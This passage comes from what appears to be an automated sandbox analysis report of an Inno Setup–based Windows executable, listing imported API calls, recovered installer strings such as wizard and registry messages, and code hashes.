                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast
                                                                              • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                              • API String ID: 1452528299-3038984924
                                                                              • Opcode ID: 2ae6e740da7d12cab45fc3fda2904aab771333dfed4c0176c99f618606694c86
                                                                              • Instruction ID: af1263a2bc2d08d5f84e5bf4467a93fc8ad6fd7f39d305876acfad47ab44e8ff
                                                                              • Opcode Fuzzy Hash: 2ae6e740da7d12cab45fc3fda2904aab771333dfed4c0176c99f618606694c86
                                                                              • Instruction Fuzzy Hash: 43016C30D0824865CF14DB9DA0412DDBBE49F09314F5485FFA895DB343EA790A0D8BAB
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$CountSleepTick
                                                                              • String ID:
                                                                              • API String ID: 2227064392-0
                                                                              • Opcode ID: 0d6abcf2624c376c92be4fe051ac8c721ea0e8e4158ee005a25feb70aac8199d
                                                                              • Instruction ID: 04319ed9576db886230fb9bc867ee798ddcaac356600663dffa6fb38092a16ff
                                                                              • Opcode Fuzzy Hash: 0d6abcf2624c376c92be4fe051ac8c721ea0e8e4158ee005a25feb70aac8199d
                                                                              • Instruction Fuzzy Hash: 70E09B7230954149DA2935BF28C67BF5588CBC5764F145D3FF08DD6282C91C4C4796BE
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7,?,?,?,?,?,0049719A,00000000), ref: 00476CB5
                                                                              • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7,?,?,?,?,?,0049719A), ref: 00476CBB
                                                                              • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7), ref: 00476CDD
                                                                              • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7), ref: 00476CEE
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                              • String ID:
                                                                              • API String ID: 215268677-0
                                                                              • Opcode ID: 643da1b25484e25618dfc2f33770e0810dba7622c7134d6ef75615b708b11c8e
                                                                              • Instruction ID: 52cacee470f693cc175e787ed480d05e054b7fb82800b5b9fad0ca038f03fef1
                                                                              • Opcode Fuzzy Hash: 643da1b25484e25618dfc2f33770e0810dba7622c7134d6ef75615b708b11c8e
                                                                              • Instruction Fuzzy Hash: 04F01CA16447016ED600EAB5CD82A9B76DCEB44354F04883ABE98C72C1D678D808AA66
                                                                              APIs
                                                                              • GetLastActivePopup.USER32(?), ref: 0042425C
                                                                              • IsWindowVisible.USER32(?), ref: 0042426D
                                                                              • IsWindowEnabled.USER32(?), ref: 00424277
                                                                              • SetForegroundWindow.USER32(?), ref: 00424281
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                              • String ID:
                                                                              • API String ID: 2280970139-0
                                                                              • Opcode ID: 815aaf66aeb93fdb7eaca90ddf7e3ec79125ce151ba931028ab749093d5bac7c
                                                                              • Instruction ID: cc3e18b4355afb8de1117362fa5ee1cc3bb5bcb08e60588071b409dab7082488
                                                                              • Opcode Fuzzy Hash: 815aaf66aeb93fdb7eaca90ddf7e3ec79125ce151ba931028ab749093d5bac7c
                                                                              • Instruction Fuzzy Hash: DBE08691B02571929E71FA671881A9F018CCD45BE434602A7FD04F7243DB1CCC0041BC
                                                                              APIs
                                                                              • GlobalHandle.KERNEL32 ref: 00406287
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0040628E
                                                                              • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00406293
                                                                              • GlobalLock.KERNEL32(00000000), ref: 00406299
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Global$AllocHandleLockUnlock
                                                                              • String ID:
                                                                              • API String ID: 2167344118-0
                                                                              • Opcode ID: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                                              • Instruction ID: ad050c8fb554795a0ca7e59246f03ac17dd57b6c6051e6027a9978793207e39e
                                                                              • Opcode Fuzzy Hash: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                                              • Instruction Fuzzy Hash: A0B009C5814A05B9EC0833B24C0BD3F141CD88072C3808A6FB458BA1839C7C9C402A3D
                                                                              APIs
                                                                              • GetSystemMenu.USER32(00000000,00000000,0000F060,00000001), ref: 0046A1F3
                                                                              • EnableMenuItem.USER32(00000000,00000000,00000000), ref: 0046A1F9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$EnableItemSystem
                                                                              • String ID: CurPageChanged
                                                                              • API String ID: 3692539535-2490978513
                                                                              • Opcode ID: ce3d69d9ba1a62642177f6d71e0f7aaa340e11e2d471205b7fc5bc675cd66b6b
                                                                              • Instruction ID: 7720c050ea6da0ef8e1be1b899a85f81ec2d70891b76be637dda81d079de5e74
                                                                              • Opcode Fuzzy Hash: ce3d69d9ba1a62642177f6d71e0f7aaa340e11e2d471205b7fc5bc675cd66b6b
                                                                              • Instruction Fuzzy Hash: 04B12834604604DFCB11DB59DA85EE973F5EF49308F2540F6E804AB362EB38AE51DB4A
                                                                              APIs
                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047A685,?,00000000,00000000,00000001,00000000,004790B1,?,00000000), ref: 00479075
                                                                              Strings
                                                                              • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 00478EE9
                                                                              • Failed to parse "reg" constant, xrefs: 0047907C
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Close
                                                                              • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                                              • API String ID: 3535843008-1938159461
                                                                              • Opcode ID: 6cfa3a26321e55d12a01db98da27023ce14a7644c07822183f99b0fb8cfb2842
                                                                              • Instruction ID: fcc941d39f61a36dc7ba98d018d7fa63e98928215e6e5a71d63c1788f81e571e
                                                                              • Opcode Fuzzy Hash: 6cfa3a26321e55d12a01db98da27023ce14a7644c07822183f99b0fb8cfb2842
                                                                              • Instruction Fuzzy Hash: F3818174E00148AFCF10EF95D485ADEBBF9AF49314F50816AE814B7391CB38AE05CB99
                                                                              APIs
                                                                              • GetForegroundWindow.USER32(00000000,00481AC0,?,00000000,00481B01,?,?,00000001,?,00000000,00000000,00000000,?,0046AF84), ref: 0048196F
                                                                              • SetActiveWindow.USER32(?,00000000,00481AC0,?,00000000,00481B01,?,?,00000001,?,00000000,00000000,00000000,?,0046AF84), ref: 00481981
                                                                              Strings
                                                                              • Will not restart Windows automatically., xrefs: 00481AA0
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ActiveForeground
                                                                              • String ID: Will not restart Windows automatically.
                                                                              • API String ID: 307657957-4169339592
                                                                              • Opcode ID: 7f50b30166131407a8f128673f7788f83b908c9bbef8313c0fb59228be05c9af
                                                                              • Instruction ID: 795901fb084f52fa528f63c2312e933fc6fdee27908fd8459f339c5c9385a105
                                                                              • Opcode Fuzzy Hash: 7f50b30166131407a8f128673f7788f83b908c9bbef8313c0fb59228be05c9af
                                                                              • Instruction Fuzzy Hash: AC41F030604240AFD725EBA5E945B6E7BA8E726704F1448B7F4408B372E37C5842DB9E
                                                                              APIs
                                                                              • GetCursorPos.USER32(?), ref: 00424975
                                                                              • WaitMessage.USER32(00000000,00424A69,?,?,?,?), ref: 00424A49
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CursorMessageWait
                                                                              • String ID: +qI
                                                                              • API String ID: 4021538199-4068327824
                                                                              • Opcode ID: 399c937e83af8c9a67e0d61dfb0eea40f0b910730a113ae452a6132c876950b5
                                                                              • Instruction ID: 850bb8641a739d3fa0e3e078eaa16554ae15adb015fc2a4b55b093a82efb48cd
                                                                              • Opcode Fuzzy Hash: 399c937e83af8c9a67e0d61dfb0eea40f0b910730a113ae452a6132c876950b5
                                                                              • Instruction Fuzzy Hash: DA31C3B17002249BCB11EF79D4817AFB7A5EFC4304F9545ABE8049B386D7789D80CA9D
                                                                              Strings
                                                                              • Failed to proceed to next wizard page; showing wizard., xrefs: 0046BD6B
                                                                              • Failed to proceed to next wizard page; aborting., xrefs: 0046BD57
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                              • API String ID: 0-1974262853
                                                                              • Opcode ID: 2243244884f8f0dbacf357e303b6debe926f1333eeaeef60402ffea89cf8a6c6
                                                                              • Instruction ID: 41ea3916521a7a624eafe14c23fd6f628d308964d0d2c815b7cc35631b26c174
                                                                              • Opcode Fuzzy Hash: 2243244884f8f0dbacf357e303b6debe926f1333eeaeef60402ffea89cf8a6c6
                                                                              • Instruction Fuzzy Hash: 6D31CE306042049FD711EB69EA85B9977E4EB15304F1440BFF804DB3A2EB386E80CB8A
                                                                              APIs
                                                                                • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                              • RegCloseKey.ADVAPI32(?,00477A26,?,?,00000001,00000000,00000000,00477A41), ref: 00477A0F
                                                                              Strings
                                                                              • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0047799A
                                                                              • %s\%s_is1, xrefs: 004779B8
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpen
                                                                              • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                              • API String ID: 47109696-1598650737
                                                                              • Opcode ID: 06886a66f565e0468b769e4592232cec9d6989d0309b3619cbd247b7a06007c3
                                                                              • Instruction ID: 9c5288f04ac2681b3320032c051d60ba9bbc132f2e03367f89e393ba1652dadd
                                                                              • Opcode Fuzzy Hash: 06886a66f565e0468b769e4592232cec9d6989d0309b3619cbd247b7a06007c3
                                                                              • Instruction Fuzzy Hash: 49216174B042046FEB01DBA9CC51A9EBBE8EB89704F90847AE504E7381D6789A058B58
                                                                              APIs
                                                                              • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 0044FA1D
                                                                              • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0044FA4E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ExecuteMessageSendShell
                                                                              • String ID: open
                                                                              • API String ID: 812272486-2758837156
                                                                              • Opcode ID: ee44408f46f22df0a1b012607f151a7a203705d09399f4342952afd6ee530704
                                                                              • Instruction ID: 219036bbd933cc3ca485a607602a83352c0bb437124d4d28150632e42eb7a986
                                                                              • Opcode Fuzzy Hash: ee44408f46f22df0a1b012607f151a7a203705d09399f4342952afd6ee530704
                                                                              • Instruction Fuzzy Hash: DD213071E00204AFEB00DFA9C881B9EB7F9EB84704F60857AB405F7291D778EA45CB58
                                                                              APIs
                                                                              • RtlEnterCriticalSection.KERNEL32(0049A420,00000000,)), ref: 004025C7
                                                                              • RtlLeaveCriticalSection.KERNEL32(0049A420,0040263D), ref: 00402630
                                                                                • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049A420,00000000,00401A82,?,?,0040222E,02161C18,000023E4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049A420,0049A420,00000000,00401A82,?,?,0040222E,02161C18,000023E4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049A420,00000000,00401A82,?,?,0040222E,02161C18,000023E4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049A420,00401A89,00000000,00401A82,?,?,0040222E,02161C18,000023E4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                              • String ID: )
                                                                              • API String ID: 2227675388-1084416617
                                                                              • Opcode ID: 88dd2724dbd3ff1c3207952c5660733b34460a855d8f77796fd9f5c01a3a41c6
                                                                              • Instruction ID: e822125da835f5420473686c3c07f3a27ad935215509521471bf00a9407fd077
                                                                              • Opcode Fuzzy Hash: 88dd2724dbd3ff1c3207952c5660733b34460a855d8f77796fd9f5c01a3a41c6
                                                                              • Instruction Fuzzy Hash: 2311EF317042046EEB25AF799E1A62A6AD497D575CB24487BF804F32D2D9FD8C0282AD
                                                                              APIs
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00494FC5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Window
                                                                              • String ID: /INITPROCWND=$%x $@
                                                                              • API String ID: 2353593579-4169826103
                                                                              • Opcode ID: 4dd764281e3e5bd3fffa96cfa0153c2ea98d45f8120ac28787629669d01cae7f
                                                                              • Instruction ID: dd767cc37dfd13d2cdbde0042d97f8edd346c26068944a47342b43ccbe763047
                                                                              • Opcode Fuzzy Hash: 4dd764281e3e5bd3fffa96cfa0153c2ea98d45f8120ac28787629669d01cae7f
                                                                              • Instruction Fuzzy Hash: 8C11D531A042498FDF01DBA5E851BAEBBE8EB49308F20447BE504E7282D73D99058B98
                                                                              APIs
                                                                                • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                              • SysFreeString.OLEAUT32(?), ref: 00446D1A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: String$AllocByteCharFreeMultiWide
                                                                              • String ID: NIL Interface Exception$Unknown Method
                                                                              • API String ID: 3952431833-1023667238
                                                                              • Opcode ID: 7e876c1741d6a4ab732274b2805af96121c7add3bd5ed47b260724fdb6465e77
                                                                              • Instruction ID: bb0b80e2a380756916404604f3e22b1e01578a82bc6816b9b9cc7d380a4acf04
                                                                              • Opcode Fuzzy Hash: 7e876c1741d6a4ab732274b2805af96121c7add3bd5ed47b260724fdb6465e77
                                                                              • Instruction Fuzzy Hash: D811D671B042089FEB04DFA59D41AAEBBACEB49304F52003EF500E7281DA799D04C62E
                                                                              APIs
                                                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,004948C4,?,004948B8,00000000,0049489F), ref: 0049486A
                                                                              • CloseHandle.KERNEL32(00494904,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,004948C4,?,004948B8,00000000), ref: 00494881
                                                                                • Part of subcall function 00494754: GetLastError.KERNEL32(00000000,004947EC,?,?,?,?), ref: 00494778
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateErrorHandleLastProcess
                                                                              • String ID: D
                                                                              • API String ID: 3798668922-2746444292
                                                                              • Opcode ID: 25970fbfba956000743cd3c8178cfbc98a37ab1c0a0b6db99df0911e7524530c
                                                                              • Instruction ID: 06a552fcbca6defc8fdbe432d7558d6d49acb7d91bb7665b8ba999baae494250
                                                                              • Opcode Fuzzy Hash: 25970fbfba956000743cd3c8178cfbc98a37ab1c0a0b6db99df0911e7524530c
                                                                              • Instruction Fuzzy Hash: D4015EB5604688AFDF14EBE1CC42E9EBBACDF88714F51007AF504E72D1D6789E068628
                                                                              APIs
                                                                              • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DCA0
                                                                              • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DCE0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
